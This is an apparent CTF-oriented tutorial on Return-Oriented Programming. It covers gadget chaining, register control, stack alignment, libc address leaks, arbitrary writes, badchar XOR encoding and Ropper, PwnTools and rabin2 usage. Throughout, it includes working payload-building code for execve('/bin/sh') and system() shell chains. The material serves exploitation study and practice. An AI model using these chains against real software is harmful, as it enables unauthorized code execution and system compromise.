Return-Oriented Programming (ROP)

Return-Oriented Programming is a common technique for exploiting buffer overflows by chaining together small pieces of existing code, called gadgets, to make the program do what you want.

The idea of ROP is pretty simple. With a buffer overflow, you can overwrite the return address that a function saved on the stack. When the function later executes its return (ret) instruction, it pops that overwritten value from the stack into the Instruction Pointer and jumps to it.

The trick is that if we put multiple addresses on the stack, we can keep returning to different tiny pieces of code. Each piece executes a few instructions we want and then ends in another ret, which pops the next address and keeps the chain going. These pieces are called ROP "gadgets", and combined they can achieve greater things, like getting a shell by executing /bin/sh.

The concept is explained in more detail in LiveOverflow's Return-Oriented Programming tutorial.

Common ideas

A few common things that you'll encounter while creating your ROP chain.

Getting values into registers

Since you control the stack, the easiest way to get a value into a register is by popping that value from the stack into that register. If you need 1337 in register $rdi, for example, you can find a pop rdi; ret gadget and place the value 1337 right after its address in your payload. The gadget pops it from the stack into $rdi and then returns to the next address in your chain. For example:

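from pwn import *

context.binary = "./binary"  # Also makes flat() pack 64-bit values
OFFSET = ...  # Offset from the start of your input to the saved return address
POP_RDI_GADGET = ...  # Find address using $ ropper -f ./binary --search 'pop rdi'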

payload = flat({
    OFFSET: [
        POP_RDI_GADGET,  # pop rdi; ret
        1337,  # Value to be popped
        ...  # Rest of your chain now that $rdi = 1337
    ]
})

If your chain is simple, you can also let PwnTools find this gadget for you:

elf = ELF("./binary")
rop = ROP(elf)  # Find ROP gadgets
rop(rdi=1337)  # Use any gadget to set $rdi = 1337
...

payload = flat({
    OFFSET: rop.chain()  # Create the chain of `ret`urns and `pop`s
})

If there are no simple pop gadgets for the registers you need, you can get creative with arithmetic gadgets like add, sub and xor. An xor ecx, ecx; ret gadget, for example, sets ecx to 0. Once a register holds a known value, you can turn it into the value you want by adding (or subtracting) the difference between the two.
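To make that arithmetic concrete: the operand an add gadget needs is the difference between the target and the current value, taken modulo 2**64 so it wraps correctly on a 64-bit register. For an xor gadget it is simply current XOR target. A minimal sketch in plain Python; the helper names are hypothetical and not part of any tool:

```python
MASK64 = (1 << 64) - 1  # 64-bit registers wrap around modulo 2**64


def addend_for(current: int, target: int) -> int:
    """Operand for an `add reg, <value>` gadget that turns current into target."""
    return (target - current) & MASK64


def subtrahend_for(current: int, target: int) -> int:
    """Operand for a `sub reg, <value>` gadget that turns current into target."""
    return (current - target) & MASK64


def xor_operand_for(current: int, target: int) -> int:
    """Operand for an `xor reg, <value>` gadget that turns current into target."""
    return current ^ target


# rdi already holds 5 and we want 1337: add 1332
print(hex(addend_for(5, 1337)))   # 0x534
# Going down with an add gadget needs a wrapped-around (huge) operand...
print(hex(addend_for(1337, 5)))   # 0xfffffffffffffacc
# ...while a sub gadget just needs the plain difference
print(subtrahend_for(1337, 5))    # 1332
```

Keep in mind that the operand itself usually has to be popped into another register first, so you still need some way to control that source register.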

rax is the return value

Another useful trick for controlling the rax register specifically is that it holds the return value of the last function call. The read() function, for example, returns the number of bytes it read, and a calculating function returns its result in rax. This can be useful for choosing which syscall to execute, like execve('/bin/sh').
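As a sketch of the read() trick, assuming your chain calls read() with a large enough count right before a syscall gadget: sending exactly 59 bytes leaves rax = 59, the x86-64 execve number. The helper below (a hypothetical name) only builds that input. read() may return fewer bytes than you sent if the data arrives in pieces, so check rax in a debugger.

```python
SYS_EXECVE_X64 = 59  # execve syscall number on x86-64 Linux


def input_for_rax(syscall_number: int, prefix: bytes = b"") -> bytes:
    """Build input whose total length equals syscall_number.

    If the chain passes this input to read() and it is read in one go,
    read() returns its length, which ends up in rax.
    """
    if len(prefix) > syscall_number:
        raise ValueError("prefix is longer than the wanted return value")
    return prefix + b"A" * (syscall_number - len(prefix))


# The prefix can carry useful data, e.g. the "/bin/sh" string itself
data = input_for_rax(SYS_EXECVE_X64, prefix=b"/bin/sh\x00")
print(len(data))  # 59
```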

Getting lucky

The easiest way to get a value into a register is if that value is already in that register at the time your ROP chain runs. Always check the registers at a breakpoint where your ROP chain starts executing, to see whether some of them already hold usable values.

Calling functions

When you call a function from code, a few things happen in assembly. First, the arguments are placed where the calling convention expects them. Then, the call instruction pushes a return address and jumps to the function, which reads its arguments from those locations. Different architectures have different calling conventions: on x86-64 Linux the first six integer arguments go in rdi, rsi, rdx, rcx, r8 and r9, while 32-bit x86 passes arguments on the stack.

If these registers already hold the values you want, you can jump straight to the function and they will be its arguments. For example, to call call_me(1337) on x64 you would need the following assembly:

mov rdi, 1337   ; Prepare the ARG0 value for x64
jmp call_me     ; Jump straight to the function (in ROP you would `ret` to pop 
                ;                           the top stack value and jump to it)

Because we jump into the function instead of using a clean call, the stack can end up misaligned on 64-bit. The x86-64 ABI requires rsp to be 16-byte aligned before a call, and some functions (system() is a common example) use instructions that crash when it isn't. If your exploit should work but segfaults inside the target function, return to a lone ret instruction first: it shifts the stack by 8 bytes and realigns it. In PwnTools you can easily do this right before your call:

rop.raw(rop.ret)
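Without PwnTools, the same chain is just 8-byte little-endian values packed after the padding. A minimal sketch; the offset and every address below are made-up placeholders, and whether the leading ret is needed depends on the target, so try with and without it:

```python
import struct


def p64(value: int) -> bytes:
    """Pack a value as 8 little-endian bytes (like PwnTools' p64)."""
    return struct.pack("<Q", value)


# Hypothetical values: look these up in your own binary
OFFSET = 40          # bytes of padding up to the saved return address
RET = 0x40053e       # ret;
POP_RDI = 0x4006a3   # pop rdi; ret;
CALL_ME = 0x400707   # address of call_me()

chain = [
    RET,      # extra ret: moves rsp by 8 bytes to fix 16-byte alignment
    POP_RDI,  # pop rdi; ret
    1337,     # -> rdi = 1337 (first argument)
    CALL_ME,  # "return" into call_me(1337)
]

payload = b"A" * OFFSET + b"".join(p64(v) for v in chain)
print(len(payload))  # 72
```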

Getting strings into registers

Many functions need strings as arguments, like the system() function or the execve() syscall, which both need "/bin/sh" as the first argument in order to spawn a shell. Strings are not passed by value, but by reference. This means we need to provide a pointer to the string as the argument, so the string has to be somewhere in memory:

  1. We need to get the string into memory

  2. We need to know its location

There are a few ways to do this, but no one-size-fits-all solution. It all depends on what is available in the binary.

Already stored in memory

If you're lucky, the string might already be somewhere in memory. libc, for example, contains a "/bin/sh" string that is often used for ret2libc. Other strings you need might be found in the binary itself.

Finding the addresses of such strings is easy with GEF's grep command while the binary is running in GDB:

gef➤  grep /bin/sh
[+] Searching '/bin/sh' in memory
[+] In '/usr/lib/x86_64-linux-gnu/libc.so.6'(0x7ffff7f42000-0x7ffff7f95000), permission=r--
  0x7ffff7f5d031 - 0x7ffff7f5d038     "/bin/sh"

If the target system has ASLR enabled, some locations like the libc library are shifted by a random offset. To use a string from libc, you first need to leak an address inside the library and then calculate the string's address relative to it. Sections of the binary itself, like .data, are only at fixed addresses if the binary is not compiled as a position-independent executable (PIE). In that case they are not randomized even with ASLR enabled, so a string stored there can always be used.
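The "leak, then use relative values" step is plain arithmetic. A sketch assuming you leaked the runtime address of puts(); both offsets are made-up examples and must come from the exact libc the target uses:

```python
# Hypothetical offsets: get the real ones from the target's libc, e.g. with
# PwnTools: libc.symbols["puts"] and next(libc.search(b"/bin/sh\x00"))
PUTS_OFFSET = 0x80e50
BIN_SH_OFFSET = 0x1d8678

leaked_puts = 0x7f1234580e50  # example runtime address of puts()

libc_base = leaked_puts - PUTS_OFFSET
bin_sh = libc_base + BIN_SH_OFFSET

# A correct base is page-aligned (low 12 bits are zero): a cheap sanity check
assert libc_base & 0xfff == 0, "wrong offset or wrong libc version"
print(hex(libc_base), hex(bin_sh))
```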

From the stack

In a buffer overflow attack, you overflow the stack with your own values to control return addresses and maybe pop values into registers. You can also use this space to store the strings you need, and then pass the stack address where such a string is stored. The string is part of your payload, so the payload references itself.

You can find the location of your string on the stack by running the program with the string in your payload and searching for it with GEF's grep command from above. Any string in your payload can then be referenced by its address on the stack.

Note that with ASLR, the stack address is randomized. This means that if ASLR is enabled, you will need to first leak a stack address and then use relative offsets from there to find your payload again.
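A sketch of a self-referencing payload, assuming you already know where the payload starts on the stack (from a leak, or from GDB when ASLR is off). The string goes after the chain, so its offset inside the payload is known in advance; the padding in front of the chain would be clobbered by the called function's own stack frame. All addresses are hypothetical:

```python
import struct


def p64(value: int) -> bytes:
    return struct.pack("<Q", value)


# Hypothetical values: replace with your own leak, offset and gadgets
buf_addr = 0x7fffffffe3a0  # where the payload starts on the stack
OFFSET = 40                # padding up to the saved return address
POP_RDI = 0x4006a3         # pop rdi; ret;
SYSTEM = 0x400560          # address of system()

bin_sh_str = b"/bin/sh\x00"
chain = [POP_RDI, 0, SYSTEM]  # the 0 is patched with the string address below

# The string is placed right after the chain inside the payload
string_offset = OFFSET + 8 * len(chain)
chain[1] = buf_addr + string_offset

payload = b"A" * OFFSET + b"".join(p64(v) for v in chain) + bin_sh_str
print(hex(chain[1]))
```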

Arbitrary write

Another method is to use an arbitrary write if you have one. Using ROP or a format string exploit, you might be able to write data to memory. You can then build the string you need piece by piece and use the address of that location.

Often there is a static, writable section like .data or .bss where you can write data without corrupting the program. You can list all sections and their addresses with many tools, such as rabin2 from radare2:

$ rabin2 -S ./binary
nth paddr        size vaddr       vsize perm name
―――――――――――――――――――――――――――――――――――――――――――――――――
...
23  0x00001050   0x22 0x00601050   0x22 -rw- .data
24  0x00001072    0x0 0x00601078   0x10 -rw- .bss
...

When searching for ROP gadgets to achieve this, look for mov instructions that store one register into the memory another register points to, like:

$ ropper -f write4 --search mov
...
0x0000000000400628: mov qword ptr [r14], r15; ret;

If you control both registers, you can write any value to any address: an "arbitrary write". There are many different ways to achieve this, so be creative with it. To form a full string, repeat the write for each 8-byte chunk at consecutive addresses.
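A sketch of that write loop, reusing the mov qword ptr [r14], r15; ret gadget and the .data address from the examples above (they may come from different binaries, so look up your own). It assumes a hypothetical pop r14; pop r15; ret gadget for loading both registers, and expects the caller to include the string's NUL terminator:

```python
import struct

MOV_R14_R15 = 0x400628  # mov qword ptr [r14], r15; ret;  (from the ropper output above)
DATA = 0x601050         # .data vaddr (from the rabin2 output above)
POP_R14_R15 = 0x400690  # hypothetical: pop r14; pop r15; ret;


def write_string(addr: int, data: bytes) -> list:
    """Return chain values that write `data` to `addr`, 8 bytes per mov."""
    data += b"\x00" * (-len(data) % 8)  # pad with NULs to a multiple of 8 bytes
    chain = []
    for i in range(0, len(data), 8):
        chunk = struct.unpack("<Q", data[i:i + 8])[0]  # 8 bytes as one qword
        chain += [POP_R14_R15, addr + i, chunk, MOV_R14_R15]
    return chain


chain = write_string(DATA, b"/bin/sh\x00")
rop = b"".join(struct.pack("<Q", v) for v in chain)
```

Afterwards, DATA can be used as the pointer to "/bin/sh" in the rest of the chain.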

execve('/bin/sh')

execve() is a system call (syscall): an operation performed by the kernel on behalf of a program. To request it, the program executes a special instruction that temporarily switches from user mode to kernel mode, where the kernel does the privileged work. There are two ways of doing this:

syscall

This instruction is used on 64-bit and reads the $rax register to decide which syscall to execute. Each syscall has a number, listed in tables of all x64 syscalls together with their arguments.

In such a table we can find execve() as number 59 (0x3B), and also what its arguments mean:

execve(char *filename = rdi, char *const *argv = rsi, char *const *envp = rdx)

In assembly, the following values should be set:

mov rax, 0x3b         ; set rax to the syscall number for execve()
mov rdi, filename     ; set rdi to the address of the filename string
mov rsi, argv         ; set rsi to the address of the argument values array
mov rdx, envp         ; set rdx to the address of the environment variables array
syscall               ; invoke the syscall

Often we don't care about arguments, because we can just run /bin/sh without any. In that case, set the extra $rsi and $rdx registers to 0 (NULL).
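As a ROP chain, those four register values become pop gadgets followed by a syscall gadget. A sketch where every gadget address and the "/bin/sh" location are hypothetical placeholders (with PwnTools, rop(rax=0x3b, rdi=BIN_SH, rsi=0, rdx=0) followed by a syscall gadget does the same):

```python
import struct


def p64(value: int) -> bytes:
    return struct.pack("<Q", value)


# Hypothetical gadget addresses and string location: replace with your own
POP_RAX = 0x401001  # pop rax; ret
POP_RDI = 0x401003  # pop rdi; ret
POP_RSI = 0x401005  # pop rsi; ret
POP_RDX = 0x401007  # pop rdx; ret
SYSCALL = 0x401009  # syscall
BIN_SH = 0x601050   # address of "/bin/sh\x00" in memory

chain = [
    POP_RAX, 0x3b,    # rax = 59 -> execve
    POP_RDI, BIN_SH,  # rdi = filename
    POP_RSI, 0,       # rsi = argv = NULL
    POP_RDX, 0,       # rdx = envp = NULL
    SYSCALL,          # execve("/bin/sh", NULL, NULL)
]
rop = b"".join(p64(v) for v in chain)
```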

int 0x80

On 32-bit x86, Linux programs traditionally make syscalls by triggering software interrupt 0x80 with the int 0x80 instruction, which invokes a syscall just like syscall does on 64-bit. int 0x80 can also show up in 64-bit binaries (it then uses the 32-bit syscall numbers and registers), so it is always worth looking for regardless of architecture.

The 32-bit syscall numbers are different from the 64-bit ones.

In the 32-bit table we can find execve() as number 11 (0x0B), with the same arguments as for syscall above. In assembly you should set the values like this (note the different registers):

mov eax, 0x0b         ; set eax to the syscall number for execve()
mov ebx, filename     ; set ebx to the address of the filename string
mov ecx, argv         ; set ecx to the address of the argument values array
mov edx, envp         ; set edx to the address of the environment variables array
int 0x80              ; invoke the syscall
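The 32-bit version of the chain packs 4-byte values instead. A sketch with hypothetical gadget addresses, including a combined pop ecx; pop edx; ret gadget that you may or may not find in your binary:

```python
import struct


def p32(value: int) -> bytes:
    """Pack a value as 4 little-endian bytes (like PwnTools' p32)."""
    return struct.pack("<I", value)


# Hypothetical gadget addresses and string location: replace with your own
POP_EAX = 0x08049001      # pop eax; ret
POP_EBX = 0x08049003      # pop ebx; ret
POP_ECX_EDX = 0x08049005  # pop ecx; pop edx; ret
INT_80 = 0x08049008       # int 0x80
BIN_SH = 0x0804c020       # address of "/bin/sh\x00"

chain = [
    POP_EAX, 0x0b,        # eax = 11 -> execve (32-bit number)
    POP_EBX, BIN_SH,      # ebx = filename
    POP_ECX_EDX, 0, 0,    # ecx = argv = NULL, edx = envp = NULL
    INT_80,               # execve("/bin/sh", NULL, NULL)
]
rop = b"".join(p32(v) for v in chain)
```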

SROP

See SigReturn-Oriented Programming (SROP).

Bypassing badchars

"badchars" is the name for characters that the application does not allow. These may be newlines (\x0A), which can make the program stop reading your payload early, or null bytes (\x00), which terminate your string early. In some specific cases more characters are banned, and you need tricks to avoid them.

If you are trying to inject "/bin/sh" in your payload for example, but the / slash is banned, you can do it in more steps. If you first write ".cho.ri", without any / slash character, you can later XOR each byte with \x01 to get back the original /bin/sh string. This requires an XOR gadget in the binary, or any other similar instruction that allows you to alter the bytes of your payload. Some common ones are:

  • xor: XOR both operands and store the result in the first

  • add: Add both operands and store the result in the first

  • sub: Subtract the second operand from the first, and store the result in the first

These allow you to change the initial string you send in the payload, and then dynamically change it after it is stored in memory on the target.
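Preparing the encoded string can be automated. A sketch with hypothetical helpers that picks the first single-byte XOR key whose output (and the key itself) avoids all badchars. It assumes a byte-wise gadget like xor byte ptr [r15], r14b, so the chain needs one gadget call per encoded byte:

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (encoding and decoding are the same)."""
    return bytes(b ^ key for b in data)


def find_key(data: bytes, badchars: bytes) -> int:
    """Return the first key whose encoding of data contains no badchars."""
    for key in range(1, 256):
        if key in badchars:
            continue  # the key itself also ends up in the payload
        if not set(xor_bytes(data, key)) & set(badchars):
            return key
    raise ValueError("no single-byte key avoids these badchars")


encoded = xor_bytes(b"/bin/sh", 0x01)
print(encoded)  # b'.cho.ri'

key = find_key(b"/bin/sh", badchars=b"/")
```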

Ropper

Ropper is a colorful CLI tool that automatically finds ROP gadgets (small pieces of code ending in a return) that are useful for building a full chain. It prints all sorts of gadgets, and the idea is that you search the output for what you need. For example, to find xor instructions:

$ ropper -f ./binary --search 'xor'
[INFO] Searching for gadgets: xor

[INFO] File: ./badchars
0x0000000000400628: xor byte ptr [r15], r14b; ret;
0x0000000000400629: xor byte ptr [rdi], dh; ret;

For more flexible filtering, you can also pipe the tool's output through grep:

$ ropper -f ./binary | grep rdi
0x000000000040062d: add byte ptr [rdi], dh; ret;
0x00000000004006a3: pop rdi; ret;
0x0000000000400631: sub byte ptr [rdi], dh; ret;
0x0000000000400629: xor byte ptr [rdi], dh; ret;

ROPgadget is a similar tool that also finds gadgets. It may find specific gadgets that Ropper misses (and vice versa), so it is worth trying both:

$ ROPgadget --binary binary | grep rdi
0x000000000040062d : add byte ptr [rdi], dh ; ret
0x00000000004006a3 : pop rdi ; ret
0x0000000000400631 : sub byte ptr [rdi], dh ; ret
0x0000000000400629 : xor byte ptr [rdi], dh ; ret
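Because the two tools print slightly different formats, a small parser helps when comparing their results or copying addresses into an exploit script. A sketch written against the plain-text output shown above; the function is hypothetical, and other tool versions may format lines differently:

```python
import re

# Matches "0x...: insn; insn;" (Ropper) and "0x... : insn ; insn" (ROPgadget)
GADGET_LINE = re.compile(r"^(0x[0-9a-fA-F]+)\s*:\s*(.+?)\s*;?\s*$")


def parse_gadgets(output: str) -> dict:
    """Map normalized gadget text (e.g. 'pop rdi; ret') to its address.

    If the same gadget appears at several addresses, the last one wins.
    """
    gadgets = {}
    for line in output.splitlines():
        match = GADGET_LINE.match(line.strip())
        if not match:
            continue  # skip [INFO] lines, blank lines and other noise
        address, text = match.groups()
        parts = [part.strip() for part in text.split(";") if part.strip()]
        gadgets["; ".join(parts)] = int(address, 16)
    return gadgets
```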

Ropper can even try to find a full chain for you. One example is the execve('/bin/sh', 0, 0) syscall, which can be automatically generated if everything required exists (note that it generated Python2 code):

$ ropper -f /bin/bash --chain execve
...
[INFO] generating rop chain
...
rop += rebase_0(0x0000000000030a9f) # 0x0000000000030a9f: pop r12; ret;
rop += '//bin/sh'
rop += rebase_0(0x0000000000030503) # 0x0000000000030503: pop rbp; ret;
rop += rebase_0(0x0000000000119000)
rop += rebase_0(0x0000000000080ea9) # 0x0000000000080ea9: mov qword ptr [rbp], r12; pop rbx; xor eax, eax; pop rbp; pop r12; ret;
...
rop += rebase_0(0x0000000000030392) # 0x0000000000030392: syscall;
print rop
[INFO] rop chain generated!
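In Python 3 the chain must be bytes, so the string literal becomes b'//bin/sh' (the double slash pads it to exactly 8 bytes) and the chain starts as b''. A sketch porting only the first lines shown above; IMAGE_BASE is a hypothetical load address of /bin/bash (leak it first if the binary is PIE), and rebase() is our own stand-in for the generated rebase_0:

```python
from struct import pack

IMAGE_BASE = 0x555555554000  # hypothetical load address of /bin/bash


def rebase(offset: int) -> bytes:
    """Pack an offset relative to the image base as an absolute 64-bit address."""
    return pack("<Q", IMAGE_BASE + offset)


rop = b""  # Python 3: the chain is bytes, not str
rop += rebase(0x30a9f)   # pop r12; ret;
rop += b"//bin/sh"       # 8-byte string popped into r12
rop += rebase(0x30503)   # pop rbp; ret;
rop += rebase(0x119000)  # address popped into rbp (the write target)
rop += rebase(0x80ea9)   # mov qword ptr [rbp], r12; pop rbx; xor eax, eax; pop rbp; pop r12; ret;
# ... the rest of the generated chain, ending with the syscall gadget
print(len(rop))  # 40
```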

PwnTools

I highly recommend using as much PwnTools magic as you can. It can significantly simplify your payload, and with print(rop.dump()) you can still see what the chain does while debugging. Setting registers or calling functions by hand is often tedious, but with the ROP class it's a breeze.

For more general PwnTools syntax, see Useful syntax. For more ROP-specific syntax, see the documentation.

from pwn import *

elf = ELF("./binary")

# Basics
rop = ROP(elf)
rop.call(0x401337)  # Jump to specific address
rop.call("name")  # Jump to function "name()"
rop.raw(b"\x00"*8)  # Add raw data to the ROP chain

# Automagic
rop.callme(1337)  # Call callme() function in the binary with 1337 argument
rop.call(rop.ret)  # Find and call a `ret` (return) instruction (useful for aligning the stack)
rop(rax=0xdead, rdi=0xbeef, rsi=0xcafe)  # Set registers
bin_sh = next(elf.search(b"/bin/sh\x00"))  # Search for string (returns address)

# Chain the payload into one
rop.chain()
# Dump details about the chain
print(rop.dump())

rabin2

rabin2 from radare2 is a CLI tool that can analyze a binary for you. It has a lot of different options for useful information while planning your ROP exploits.

$ rabin2 [OPTIONS...] ./binary
  • -i: Show imports (imported functions)

  • -z: Show strings in .data section

  • -s: Show all symbols

  • -S: Show sections (with addresses)
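When looking for a place to write strings, the -S output can be filtered for writable sections. A sketch of a hypothetical helper written against the rabin2 -S output shown earlier (columns nth, paddr, size, vaddr, vsize, perm, name); other radare2 versions may print different columns:

```python
def writable_sections(rabin2_output: str) -> dict:
    """Map section name -> (vaddr, vsize) for sections with 'w' permission."""
    sections = {}
    for line in rabin2_output.splitlines():
        fields = line.split()
        # Data rows look like: nth paddr size vaddr vsize perm name
        if len(fields) != 7 or not fields[0].isdigit():
            continue  # skip the header, separator and "..." lines
        _, _, _, vaddr, vsize, perm, name = fields
        if "w" in perm:
            sections[name] = (int(vaddr, 16), int(vsize, 16))
    return sections
```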
